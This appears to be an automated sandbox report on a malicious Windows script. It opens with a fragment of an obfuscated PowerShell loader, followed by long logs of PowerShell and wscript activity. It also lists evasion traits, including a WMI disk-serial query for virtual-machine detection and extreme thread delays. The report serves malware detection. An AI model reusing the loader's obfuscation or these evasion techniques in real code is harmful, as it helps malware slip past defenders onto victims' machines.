(Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLoJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA4BFA pushad ; retf 3_2_00007FFD9BAA4C11
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA56CC push ds; iretd 3_2_00007FFD9BAA56DA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA46BC push edi; retf 3_2_00007FFD9BAA46DA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA46AC push ebp; retf 3_2_00007FFD9BAA46BA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA461C push ecx; retf 3_2_00007FFD9BAA462A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA462C push esp; retf 3_2_00007FFD9BAA46AA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA458C push eax; retf 3_2_00007FFD9BAA461A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA7564 push ebx; iretd 3_2_00007FFD9BAA756A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA09CA push E95AE6D0h; ret 3_2_00007FFD9BAA09C9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA55BD push es; iretd 3_2_00007FFD9BAA55D2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA0942 push E95AE6D0h; ret 3_2_00007FFD9BAA09C9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAA00BD pushad ; iretd 3_2_00007FFD9BAA00C1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_02DF3F9A push esp; retf 6_2_02DF3FC9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074DCF55 push esp; iretd 6_2_074DCF5D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074DAD06 pushfd ; ret 6_2_074DAD11
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074DE5A8 push esp; retf 6_2_074DE5A9
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4214Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5697Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6975Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2737Jump to behavior
            Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 5225Jump to behavior
            Source: C:\Windows\System32\wscript.exe TID: 6668Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4428Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5816Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: powershell.exe, 00000003.00000002.1879310983.0000021AB15E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
            Source: wscript.exe, 00000000.00000003.1694250405.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692511398.000002343CD48000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1705228626.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693202979.000002343CD48000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694132629.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702191614.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703367257.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693904891.000002343CD40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm7"
            Source: wscript.exe, 00000000.00000003.1694250405.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692511398.000002343CD48000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694250405.000002343CCD4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694132629.000002343CCCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1705228626.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703367257.000002343CCD4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1704114347.000002343CCD6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693986988.000002343CCCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693202979.000002343CD48000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694132629.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692910976.000002343CCB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
